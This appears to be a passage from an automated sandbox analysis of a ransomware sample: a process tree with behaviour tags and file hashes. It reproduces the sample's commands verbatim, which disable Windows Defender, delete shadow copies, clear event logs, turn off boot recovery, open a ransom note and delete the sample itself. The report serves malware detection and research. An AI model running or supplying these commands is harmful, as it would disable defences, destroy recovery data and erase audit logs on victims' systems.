C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1132
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1464
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1124
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:824
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:700
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:684
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1592
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1228 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:852
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1356 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1680 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1648 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:752
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1328 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1380 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1940 -
C:\Windows\system32\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2356 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"2⤵PID:2364
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2388
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 636a642cc51545ec0988c32c35ec97d9
  SHA1: a2cc9c2669d423dc80ab3bad49f166f492580b6b
  SHA256: 372ca373730a40c32719de2ac0119671b1e84b31ddb6919e796016562470c584
  SHA512: 90373432cc1b50577b9ef6594bd5673f5fb0a705ef7bf5d1231c879ff043cff1a95c9c9838313173dcaf6958d0583a2723fd36b9c4cf250ec17bbf3b6493ebff
-
  MD5: 3d3aab4fac96343c7e4bf9f111f89193
  SHA1: 550d2ea76bb0a789e4bfbefef4a899c4fbad254c
  SHA256: 54643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
  SHA512: 15b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda